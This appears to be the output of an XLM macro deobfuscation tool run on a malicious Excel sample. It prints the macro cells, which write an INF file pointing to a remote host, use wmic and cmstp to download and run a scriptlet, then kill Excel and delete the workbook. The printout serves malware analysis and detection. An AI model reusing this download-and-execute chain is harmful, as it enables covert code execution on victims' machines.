Work in progress

1. Ongoing - it is not fully deobfuscated
2.  
3.  
4. _ _______
5. |\ /|( \ ( )
6. ( \ / )| ( | () () |
7. \ (_) / | | | || || |
8. ) _ ( | | | |(_)| |
9. / ( ) \ | | | | | |
10. ( / \ )| (____/\| ) ( |
11. |/ \|(_______/|/ \|
12. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
13. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
14. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
15. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
16. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
17. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
18. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
19. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
20.  
21.  
22. XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator
23.  
24. File: C:\Users\user\Downloads\saaaample.xls
25.  
26. [Loading Cells]
27. auto_open: auto_open->Macro1!$A$2
28. [Starting Deobfuscation]
29. CELL:A2 , NotImplemented , SET.NAME("Yuaf",DIRECTORY()&CHAR(92.0)&CHAR(50.0)&CHAR(52.0)&CHAR(46.0)&CHAR(116.0)&CHAR(120.0)&CHAR(116.0))
30. CELL:A3 , NotImplemented , SET.NAME("nCWoR",FOPEN(Yuaf,3.0))
31. CELL:A4 , PartialEvaluation , FWRITE("[version]
32. signature=$WiNdows NT$
33. [DestinationDirs]
34. e7=01
35. [DefaultInstall_singleUser]
36. UnRegisterOCXs=b0
37. DelFiles=e7
38. [b0]
39. %11%\%h9%CrO%q1%j,NI,%i9%%u3%%u3%p%v0%%j4%%j4%")
40. CELL:A5 , PartialEvaluation , FWRITE("download%q7%share-spreadsheet%q7%%d2%/readme%q7%txt
41. [e7]
42. 24%q7%%u3%x%u3%
43. [strings]
44. u3=t
45. i9=h
46. v0=:
47. h9=s
48. j4=/
49. q1=b
50. q7=.
51. d2=com
52. serviceName="" ""
53. shortSvcName="" ""
54. f6=2020-05-22 16:01:58.777231")
55. CELL:A6 , PartialEvaluation , FCLOSE()
56. CELL:A7 , PartialEvaluation , REGISTER("Shell32","ShellExecuteA","JJCCCCJ","UIBsfb",1.0,9.0)
57. CELL:A8 , PartialEvaluation , CALL_ADDIN(0.0,"cmd.exe","/v /c set h3=times& call set q0=%h3:~0,1%& call set y8=%h3:~1,1%& s!q0!art /min """" wm!y8!c process call crea!q0!e ""cms!q0!p /ns /s /su Yuaf""",0.0)
58. CELL:A9 , PartialEvaluation , CALL_ADDIN(0.0,"cmd.exe","/c taskkill /f /im excel.exe & ping 127.0.0.1 -n 3 & del ""GET.DOCUMENT(2.0)\GET.WORKBOOK(16.0)""",0.0)
59. CELL:A10 , PartialEvaluation , RETURN()
60. [END of Deobfuscation]
61. time elapsed: 2.8414695262908936